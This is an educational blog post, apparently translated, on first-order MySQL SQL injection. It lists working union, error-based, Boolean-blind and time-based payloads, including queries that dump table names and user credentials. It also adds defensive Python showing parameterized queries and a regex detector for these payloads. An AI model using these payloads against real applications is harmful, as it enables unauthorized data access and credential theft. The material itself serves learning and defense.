A summary of the first-order SQL injection

0x00 Preface

SQL injection works by making user input part of the SQL statement the application executes, so that the attacker's goal is achieved through the database. In a word: never trust any user input, and protect every place it reaches the database.

0x01 How parameters are passed

Parameters are usually submitted by GET or POST. GET is more efficient; POST is somewhat more secure and allows longer parameters. In SQL injection attacks, anywhere the user can enter content is a candidate injection point. In addition, SQL injection can occur through HTTP headers such as Referer and Cookie. So keep an open mind: any content that enters the database may be a point of attack.

0x02 Common MySQL Statements

The following are the back-end statements most often guessed at during injection:

(1) SELECT column name FROM table name WHERE condition # select data from a table

Example: select username,password from users where id=input

(2) UPDATE table name SET column name = new value WHERE other column name = value # modify a value in a table

Example: update users set password='inputpass' where username='inputuser'

(3) INSERT INTO table name VALUES (value 1, value 2, ...) # insert a new row into a table; each inserted value may be the result of an expression

Example: insert into users values('+', 'name', 'pass')

Common operations and functions used in injection:

(1) Comments: #, --+, /* */
(2) Union query: the UNION operator combines the result sets of two or more SELECT statements.
(3) ORDER BY sorts the result set; in an attack it is used to test the number of columns.
(4) group_concat() works out which rows belong to the same group and joins their column values into one string; in an attack it is mainly used to display many fields at once.
(5) count() counts the number of rows.
(6) rand() generates a random number between 0 and 1.
(7) floor() rounds down.
(8) GROUP BY groups the results according to the rule we specify (the grouped results are sorted).
(9) outfile: select ... from ... into outfile 'target file' exports the contents of a table to a text file.
(10) dumpfile: select ... from ... where ... limit 0,1 into dumpfile 'target file' exports a single row to a file, which is why the limit is added.
(11) load_file: select load_file('target file') reads the file written above.
(12) length() returns the length of a string.
(13) substr() extracts part of a string: substr(string, position, length), for example substr(database(),1,1).
(14) ascii() returns the ASCII code of a character; comparing that code with >, <, = narrows the range and determines the character.
(15) sleep(n) suspends execution for n seconds; used in time-based blind injection.
(16) if(A,B,C) is equivalent to A ? B : C.

0x03 Constructing SQL injection statements

(1) SELECT column name FROM table name WHERE condition

select username,password from users where id=input
select username,password from users where id='input'
select username,password from users where id="input"
select username,password from users where id=('input')

Take the second form as an example.

I. Union-based injection

1) Guess the back-end statement: try entering ' " ) / \ and see whether an error is produced.
2) Test: 1' or '1'='1
After insertion the statement becomes:

select username,password from users where id='1' or '1'='1'

The quotes close correctly and the statement executes. Alternatively, use a comment to close the statement. Test:

1' or 1=1#
1' or 1=1--+

3) Test the number of columns with ORDER BY:

1' order by 3#
select username,password from users where id='1' order by 3#'

Success proves the statement has no error and the table has at least 3 columns.
Continue testing with 1' order by 4#; an error proves the table has exactly 3 columns.
4) Union query with UNION SELECT:

1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+

group_concat() dumps all table names at once.
5) User names and passwords:

1' union select 1,group_concat(username,password),3 from users--+
# any other expression can also be substituted at positions 1, 2 and 3

II. Error-based injection
1) Guessing the injected statement is the same as above and is not repeated.
2) Statement test: when 1' union select 1,2,3--+ returns only the normal page, without displaying our data, we need to use the error message instead.
3)
1' and (select 1 from (select count(*),concat('~','~',database(),'~','~',floor(rand()*2)) name from information_schema.tables group by name) b)--+
Meaning: concat('~','~',database(),'~','~',floor(rand()*2)) is aliased as name, and count(*) is counted for each name; at this point an error is raised, and the error message leaks the value of database(). The '~' characters make the value easy to spot.
Analysis of the whole statement:
Overall it is equivalent to select 1 from b;
where b = select count(*), concat('~','~',database(),'~','~',floor(rand()*2)) name from information_schema.tables group by name, that is, the count(*) of each name;
name = concat('~','~',database(),'~','~',floor(rand()*2))

III. Boolean-based blind injection
1)
When every input produces only two kinds of page, a correct page and an error page, and no error message is displayed, Boolean-based blind injection is needed. Each character is determined by guessing the ASCII code of the characters of the target string; the process is tedious, so an automated tool is more convenient.
2)
Statement construction:

1' and (ascii(substr(database(),1,1))>100)--+

If the correct page is returned the range is right; if the error page is returned the range is wrong; the exact value is then confirmed with an equals comparison.

IV. Time-based blind injection
1)
In this case every statement produces only the correct page, so time-based blind injection is used. The principle is that when the condition is true the sleep() function executes and the program hangs, which tells us whether the statement was true or false. sleep(5), which suspends the program for 5 seconds, is generally used.
2)
Statement construction:

1' and (select if(ascii(substr(database(),1,1))>100,sleep(5),null))--+

(2) UPDATE table name SET column name = new value WHERE other column name = value # modify a value in a table

Example: update users set password='inputpass' where username='inputuser'

Error-based SQL injection
Statement construction:

uname=admin&passwd=' and (select 1 from (select count(*),concat("~",database(),"~",floor(rand()*2)) name from information_schema.tables group by name) b)#&submit=submit

(3) INSERT INTO table name VALUES (value 1, value 2, ...) # insert a new row into a table; each inserted value may be the result of an expression.
Here again keep an open mind and be aware of how broad the injection surface is:
for example User-Agent and HTTP Referer may also be injection points.
Error-based SQL injection
Statement construction:

1', (select 1 from (select count(*),concat("~",(select table_name from information_schema.tables where table_schema=database() limit 0,1),"~",floor(rand()*2)) name from information_schema.tables group by name) b)
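To show why the quoted-id select form (1) and the header-fed insert form (3) above are dangerous, and what the same queries look like when the input is bound as a parameter and never becomes SQL, here is an added example that is not from the original post. It uses Python's sqlite3 with a constructed in-memory users table (SQLite differs from MySQL mainly in which comment syntax it accepts, so only the tautology payload from step I.2 is used); the table rows and the User-Agent value are constructed.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the users table used in the article's examples."""
    db = sqlite3.connect(":memory:")
    db.execute("create table users(id integer, username text, password text)")
    db.executemany("insert into users values(?,?,?)",
                   [(1, "alice", "s3cret"), (2, "bob", "hunter2")])  # constructed rows
    db.execute("create table access_log(user_agent text, referer text)")
    return db

def lookup_vulnerable(db, user_input):
    """Form (1): select username,password from users where id='input', with the input pasted in."""
    sql = "select username,password from users where id='%s'" % user_input
    return db.execute(sql).fetchall()

def lookup_safe(db, user_input):
    """Same query with the value bound as a parameter, so it can never become SQL."""
    return db.execute("select username,password from users where id=?",
                      (user_input,)).fetchall()

def log_headers_vulnerable(db, user_agent, referer):
    """Form (3): an insert built by concatenating two HTTP headers into the statement."""
    db.execute("insert into access_log values('%s','%s')" % (user_agent, referer))

def log_headers_safe(db, user_agent, referer):
    """Same insert with both header values bound as parameters."""
    db.execute("insert into access_log values(?,?)", (user_agent, referer))

def header_insert_outcome(db, user_agent, referer, safe):
    """'stored' if the row was written, otherwise the sqlite3 error class name;
    a single stray quote in a header is enough to break the concatenated form."""
    try:
        (log_headers_safe if safe else log_headers_vulnerable)(db, user_agent, referer)
        return "stored"
    except sqlite3.Error as err:
        return type(err).__name__

if __name__ == "__main__":
    db = make_db()
    payload = "1' or '1'='1"                    # the tautology from step I.2)
    print(lookup_vulnerable(db, payload))        # every row comes back
    print(lookup_safe(db, payload))              # nothing matches the literal string
    ua = "Mozilla/5.0 (X11; it's a test)"        # constructed header containing a quote
    print(header_insert_outcome(db, ua, "-", safe=False),
          header_insert_outcome(db, ua, "-", safe=True))
```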

0x04 Commonly used error-based statements

1. (select 1 from (select count(*),concat("~",(select table_name from information_schema.tables where table_schema=database() limit 0,1),"~",floor(rand()*2)) name from information_schema.tables group by name) b) /* dump the database */
2. (select 1 from (select count(*),concat("~",current_user,"~",floor(rand()*2)) name from information_schema.tables group by name) b) /* dump the current user name */
3. (select 1 from (select count(*),concat("~",(select username from users limit 0,1),"~",floor(rand()*2)) name from information_schema.tables group by name) b) /* dump user names */
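From the defender's side, the techniques in 0x03 (tautologies, ORDER BY and UNION probes, the floor(rand()*2) error-based statements, and the ascii(substr()) and sleep() blind payloads) and the statements in 0x04 all leave recognisable traces in the request parameters and headers. The following is an added example, not code from the original post: a small Python detector that decodes each query parameter, User-Agent and Referer from a constructed tab-separated log format and reports which signatures each one matches. The regular expressions are my own heuristics and would need tuning before being used on real traffic.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Heuristic signatures for the techniques described in 0x03 and 0x04.
# Written for this example; tune before relying on them against real traffic.
SIGNATURES = {
    "tautology":      re.compile(r"'\s*or\s+'?\d+'?\s*=\s*'?\d+", re.I),
    "union_select":   re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "schema_read":    re.compile(r"\binformation_schema\.", re.I),
    "error_based":    re.compile(r"\bfloor\s*\(\s*rand\s*\(\s*\)\s*\*\s*2", re.I),
    "boolean_blind":  re.compile(r"\bascii\s*\(\s*substr", re.I),
    "time_based":     re.compile(r"\bsleep\s*\(\s*\d+", re.I),
    "comment_close":  re.compile(r"(--\s*\+|#)\s*$"),
}

def classify(value):
    """Names of the signatures matched by one decoded input value."""
    return [name for name, rx in SIGNATURES.items() if rx.search(value)]

def inputs_from_log(line):
    """Split one constructed tab-separated log line (client, method, URI,
    User-Agent, Referer) into the user-controlled values the article lists:
    every decoded query parameter plus the two headers."""
    _client, _method, uri, user_agent, referer = line.rstrip("\n").split("\t")
    values = {}
    for name, vals in parse_qs(urlsplit(uri).query, keep_blank_values=True).items():
        values["param:" + name] = " ".join(vals)
    values["header:User-Agent"] = user_agent
    values["header:Referer"] = referer
    return values

def scan(lines):
    """Map line number -> {input location: [matched signatures]}, suspicious lines only."""
    report = {}
    for n, line in enumerate(lines, 1):
        hits = {loc: classify(v) for loc, v in inputs_from_log(line).items()}
        hits = {loc: sigs for loc, sigs in hits.items() if sigs}
        if hits:
            report[n] = hits
    return report

# Constructed sample log: one benign request, then the payloads quoted in 0x03.
SAMPLE_LOG = [
    "10.0.0.5\tGET\t/user.php?id=1\tMozilla/5.0\t-",
    "10.0.0.7\tGET\t/user.php?id=1%27+or+%271%27%3D%271\tMozilla/5.0\t-",
    "10.0.0.7\tGET\t/user.php?id=1%27+order+by+3%23\tMozilla/5.0\t-",
    "10.0.0.7\tGET\t/user.php?id=1%27+union+select+1%2Cgroup_concat%28table_name%29%2C3+from+information_schema.tables--%2B\tMozilla/5.0\t-",
    "10.0.0.9\tGET\t/user.php?id=1%27+and+%28select+if%28ascii%28substr%28database%28%29%2C1%2C1%29%29%3E100%2Csleep%285%29%2Cnull%29%29--%2B\tMozilla/5.0\t-",
    "10.0.0.9\tPOST\t/login.php\tMozilla/5.0\thttp://example.test/', (select 1 from (select count(*),concat('~',database(),floor(rand()*2)) name from information_schema.tables group by name) b)--+",
]
```

Calling scan(SAMPLE_LOG) flags lines 2 to 6 only, and for line 6 the hit is in the Referer header rather than in a query parameter, which is the point the article makes about headers being injection points too.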

Common MySQL system functions and variables include:

user() user name;
session_user() user name of the database connection;
database() current database name;
version() MySQL version;
@@datadir database data directory;
current_user current user name;
@@hostname host name;
@@port database port;
@@version_compile_os operating system;
@@basedir MySQL installation path

0x05 Using sqlmap

sqlmap is an essential and powerful injection tool. It can perform POST injection (--data), cookie injection (--cookie), a custom injection level (--level), a custom injection parameter (-p), a custom delay time (--delay), evaluation of custom Python code (--eval), and payload wrapping (--prefix, --suffix).

0x06 Summary

The essence of SQL injection is learning to find the injection point wherever it may be and to construct the statement so that the SQL command is executed and the goal of the attack is achieved. Learning automated tools such as sqlmap greatly improves efficiency, but learning manual injection is also necessary in order to truly understand the nature of SQL injection. Finally, please go easy on me, and I welcome any guidance from more experienced readers.
